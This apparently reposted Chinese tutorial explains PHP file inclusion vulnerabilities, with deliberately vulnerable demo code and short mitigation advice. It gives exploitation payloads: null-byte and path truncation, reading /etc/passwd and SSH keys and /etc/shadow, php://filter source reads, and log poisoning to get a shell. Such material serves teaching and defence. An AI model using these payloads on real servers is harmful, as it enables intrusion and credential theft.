2. 程式人生 > >任意檔案包含漏洞

任意檔案包含漏洞

阿新 發佈:2018-12-23

松鼠說web安全之檔案包含

    無需言,做自己。

0x01 漏洞成因

    通過引入檔案時,引用的檔名,使用者可控,由於傳入的檔名沒有經過合理的校驗,或者檢驗被繞過,從而操作了預想之外的檔案,就可能導致意外的檔案洩露甚至惡意的程式碼注入。
  •     本地檔案包含漏洞
                           被包含的檔案在伺服器本地
  •    遠端檔案包含漏洞。
                           被包含的檔案在第三方伺服器
          條件: php.ini中配置項:
                 allow_url_fopen      ON
                 allow_url_include   ON

0x02 PHP中常見的檔案包含函式

  • include():當使用該函式包含檔案時,只有程式碼執行到include()函式是才將檔案包含進來,發生錯誤時只給出一個警告,繼續向下執行
  • include_once():功能和include()相同,區別在於當重複呼叫同意檔案時,程式只調用一次
  • requier(): 使用require函式包含檔案時,只要程式一執行,立即呼叫指令碼;如果前者執行發生錯誤,函式或輸出錯誤資訊,並終止指令碼執行
  • require_once()功能與require()相同,區別在於當重複呼叫同一檔案時,程式只調用一次

總結:

    (1) include() 執行到該函式時才會包含檔案,而require() 程式一執行就載入檔案;

    (2) ***_once() 已載入的不重複載入

0x30 漏洞危害

  • 執行任意指令碼程式碼
  • 控制網站
  • 控制伺服器

0x40 漏洞利用

 本地檔案包含

  1. 上傳圖片,包含圖片Getshell
  2. 讀檔案,讀PHP檔案
  3. 包含日誌檔案GetShell
  4. 包含/proc/self/environ檔案GetShell
  5. 如果有phpinfo可以包含臨時檔案
  6. 包含data:// 或者 php://input 等協議(需要allow_url_include=on)

1、包含圖片的檔案上傳

demo1 show.php:

<?php
if($_GET['page']){
	include($_GET['page']);
}else{
	include("show.php");
}
?>

上傳圖片 1_php.jpg

<?php
phpinfo();
?>

測試:

http://localhost/code_inject/1/show.php?page=upload/20160801155130.jpg

demo2 show.php:

<?php
if($_GET['page']){
	include("./action/".$_GET['page']);
}else{
	include("./action/show.php");
}
?>
http://localhost/code_inject/2/show.php?page=../upload/20160801155526.jpg

demo3 show.php:

<?php
if($_GET['page']){
	include("./action/".$_GET['page'].".php");
}else{
	include("./action/show.php");
}
?>

http://localhost/code_inject/3/show.php?page=../upload/20160801155718.jpg%00

2、“%00”截斷的方式

     讀取/etc/passwd檔案:/etc/passwd%00

條件:php.ini 中需要 magic_quotes_gpc = off,PHP小於5.3.4有效

3、路徑長度截斷

     /etc/passwd/./././././.[...]/./././.

條件:PHP版本小於5.2.8(?)可以成功,linux需要檔名長於4096,window需要長於256

4、讀檔案

index.php?file=/etc/passwd

5、敏感檔案: 
<code class="hljs avrasm has-numbering">/root/<span class="hljs-preprocessor">.ssh</span>/authorized_keys 
/root/<span class="hljs-preprocessor">.ssh</span>/id_rsa 
/root/<span class="hljs-preprocessor">.ssh</span>/id_rsa<span class="hljs-preprocessor">.keystore</span> 
/root/<span class="hljs-preprocessor">.ssh</span>/id_rsa<span class="hljs-preprocessor">.pub</span> 
/root/<span class="hljs-preprocessor">.ssh</span>/known_hosts 
/etc/shadow 
/root/<span class="hljs-preprocessor">.bash</span>_history 
/root/<span class="hljs-preprocessor">.mysql</span>_history
/proc/self/fd/fd[<span class="hljs-number">0</span>-<span class="hljs-number">9</span>]* (檔案識別符號) 
/proc/mounts
/proc/config<span class="hljs-preprocessor">.gz</span></code>

6、讀取PHP檔案

index.php?file=php://filter/read=convert.dase64.encode/resource=index.php

7、包含日誌檔案GetShell (需要一定的讀取許可權)

    首先要找到日誌檔案的存放位置

  1.   檔案包含漏洞去讀取apache的配置檔案
  2.  index.php?page=/etc/init.d/httpd
  3.  index.php?page=/etc/httpd/conf/httpd.conf
  4. 預設位置 /var/log/httpd/access_log 

    讓日誌檔案插入PHP程式碼

  1.  burpsuite抓包改包
  2. curl發包
  3. php程式碼插入到get請求部分或者user_agent部分

    包含日誌檔案

index.php?page=/var/log/httpd/access_log

8、包含環境變數GetShell

   需要PHP執行在CGI模式,然後和包含日誌檔案一樣,在User_agent中修改成payload

遠端檔案包含

條件:

php.ini 中配置項

alow_url_fopen ON

allow_url_include ON
  1. 遠端伺服器存在一個txt檔案,或者一個不被當前伺服器解析的php檔案(包含的時候 包含的是返回的php原始碼,所以php原始碼不能被解析
  2.  index.php?page=http://www.xx.com/1/txt

0x05 漏洞挖掘

  •  特定的CMS,特定的版本可能存在漏洞
  •  web漏洞掃描器掃描,常見web漏洞掃描器都支援檔案包含漏洞的檢測

0x06 漏洞修復

  •  php中可以使用 open_basedir配置限制訪問許可權在指定區域
  • 過濾 . (點) / (斜槓)  \ (反斜槓)
  • 禁止伺服器遠端檔案包含

補充:

appache日誌檔案預設在

/etc/httpd/logs/access_log

或者

/var/log/httpd/access_logs

也可以找到apache的配置檔案,通過配置檔案找齊日誌檔案路徑:

/etc/httpd/conf/httpd
或者 
/etc/init.d/httpd

nginx日誌檔案預設在:

安裝目錄logs目錄下

以我的安裝路徑為例/usr/local/nginx ------ 日誌目錄就是在/usr/local/nginx/logs裡

window 2003+iis6.0 日誌檔案預設放在

C:\WINDOWS\system32\Logfiles

配置檔案預設在

C:\Windows/system32\inetsrv\metabase.xml

iis 7日誌檔案預設在

%SystemDrive%\inetpub\logs\LogFiles

配置檔案預設目錄

C:\Windows\System\inetsrv\config\applicationHost.config

相關推薦

任意檔案包含漏洞

松鼠說web安全之檔案包含     無需言,做自己。 0x01 漏洞成因     通過引入檔案時,引用的檔名,使用者可控,由於傳入的檔名沒有經過合理的校驗,或者檢驗被繞過,從而操作了預想之外的檔案,就可能導致意外的檔案洩露甚至惡意的程式碼注入。     本地檔案包含漏洞

18.phpmyadmin 4.8.1 遠端檔案包含漏洞(CVE-2018-12613)

phpmyadmin 4.8.1 遠端檔案包含漏洞(CVE-2018-12613) phpMyAdmin是一套開源的、基於Web的MySQL資料庫管理工具。其index.php中存在一處檔案包含邏輯, 通過二次編碼即可繞過檢查,造成遠端檔案包含漏洞。 受影響版本: phpMyAdmin 4.8.0和4

BugkuCTF檔案包含漏洞

雖然是參考別人的,但是,為了能夠靈活使用工具啥的,拓展一下還是每天來一題CTF吧。 writeup正版點這裡 題目所給的程式碼塊 <?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "va

檔案包含漏洞原理

什麼是檔案包含漏洞: PHP檔案包含漏洞的產生原因是在通過PHP的函式引入檔案時,由於傳入的檔名沒有經過合理的校驗,從而操作了預想之外的檔案,就可能導致意外的檔案洩露甚至惡意的程式碼注入。最常見的就屬於本地檔案包含(Local File Inclusion)漏洞了。 程式開發人員一般會把重複

檔案包含漏洞詳解

原文作者: m4r10 http://hi.baidu.com/m4r10 轉載請註明版權 &&&遠端檔案包含漏洞&&& 一、 什麼才是"遠端檔案包含漏洞"?回答是:伺服器通過php的特性(函式)去包含任意檔案時,由於要包含的這個檔案來源過

Kali學習筆記31:目錄遍歷漏洞檔案包含漏洞

文章的格式也許不是很好看,也沒有什麼合理的順序 完全是想到什麼寫一些什麼,但各個方面都涵蓋到了 能耐下心看的朋友歡迎一起學習,大牛和槓精們請繞道   目錄遍歷漏洞: 應用程式如果有操作檔案的功能,限制不嚴格會導致可以訪問到WEB目錄意外的檔案 目錄遍歷漏洞和檔案包含漏洞本質以及利用方法一

bugku-flag在index裡(本地檔案包含漏洞+php偽協議)

題目地址http://123.206.87.240:8005/post/ click點選進去 從 url地址可以猜測,需要用到 php://filter偽協議。 用法: php://filter/read=convert.base64encode/resourc

bugku-檔案包含2(檔案包含漏洞)

本文介紹三種方法,還會講到這道題菜刀的連線。  進入題目頁面,沒有什麼特別的,只能右鍵檢視原始碼,發現提示需要跳轉到 upload.php上傳頁面     方法一: ①新建一個txt檔案寫入  <script l

php://filter(檔案包含漏洞利用)

 檔案包含漏洞:https://blog.csdn.net/fageweiketang/article/details/80699051 篩選過濾應用:  1、 字串過濾器: string.rot13 對字串執行ROT13轉換 string.to

【程式碼審計】CLTPHP_v5.5.3後臺任意檔案刪除漏洞分析

  0x00 環境準備 CLTPHP官網:http://www.cltphp.com 網站原始碼版本:CLTPHP內容管理系統5.5.3版本 程式原始碼下載:https://gitee.com/chichu/cltphp 預設後臺地址: http://127.0.0.1/admin/log

【程式碼審計】CLTPHP_v5.5.3後臺任意檔案下載漏洞分析

  0x00 環境準備 CLTPHP官網:http://www.cltphp.com 網站原始碼版本:CLTPHP內容管理系統5.5.3版本 程式原始碼下載:https://gitee.com/chichu/cltphp 預設後臺地址: http://127.0.0.1/admin/log

【程式碼審計】Cscms_v4.1 任意檔案刪除漏洞例項

  環境搭建: CSCMS :http://www.chshcms.com/ 網站原始碼版本:Cscms_v4.1正式版(釋出日期:2017-06-05) 程式原始碼下載:https://github.com/chshcms/cscms   漏洞例項一: 漏洞檔案位

【程式碼審計】EasySNS_V1.6 前臺任意檔案下載漏洞分析

  0x00 環境準備 EasySNS官網:http://www.imzaker.com/ 網站原始碼版本:EasySNS極簡社群V1.60 程式原始碼下載:http://es.imzaker.com/index.php/Topic/gview/id/92.html 預設後臺地址:http

【程式碼審計】大米CMS_V5.5.3 任意檔案讀取漏洞分析

  0x00 環境準備 大米CMS官網:http://www.damicms.com 網站原始碼版本:大米CMS_V5.5.3試用版(更新時間:2017-04-15) 程式原始碼下載:http://www.damicms.com/downes/dami.rar 測試網站首頁:  

【程式碼審計】YzmCMS_PHP_v3.6 任意檔案刪除漏洞分析

  0x00 環境準備 YzmCMS官網:http://www.yzmcms.com/ 程式原始碼下載:http://pan.baidu.com/s/1pKA4u99 測試網站首頁:   0x01 程式碼分析 1、檔案位置: /application/member/contr

【程式碼審計】XIAOCMS_後臺database.php頁面存在任意檔案刪除漏洞

  0x00 環境準備 XIAOCMS官網: http://www.xiaocms.com/ 網站原始碼版本:XiaoCms (釋出時間:2014-12-29) 程式原始碼下載:http://www.xiaocms.com/download/XiaoCms_20141229.zip 測試網

【程式碼審計】XYHCMS V3.5任意檔案下載漏洞分析

  0x00 環境準備 XYHCMS官網:http://www.xyhcms.com/ 網站原始碼版本:XYHCMS V3.5(2017-12-04 更新) 程式原始碼下載:http://www.xyhcms.com/Show/downl

【程式碼審計】XYHCMS V3.5任意檔案刪除漏洞分析

  0x00 環境準備 XYHCMS官網:http://www.xyhcms.com/ 網站原始碼版本:XYHCMS V3.5(2017-12-04 更新) 程式原始碼下載:http://www.xyhcms.com/Show/downl

BugkuCTF(1)檔案包含漏洞

雖然是參考別人的,但是,為了增強下記憶力,順便督促自己天天做題,還是每天來一題CTF吧。 writeup正版點這裡 題目所給的程式碼塊 <?php include "flag.php"; $a = @$_REQUEST['hello'];

phpMyAdmin 4.0.1--4.2.12 本地檔案包含漏洞(CVE-2014-8959)

利用條件: 1.登入phpmyadmin後臺 2.需要截斷 滿足第二個條件  php版本必須 <5.3.4  搭建環境 我們在www目錄下放置phpinfo.txt 和 phpadmin4.0.3 phpmya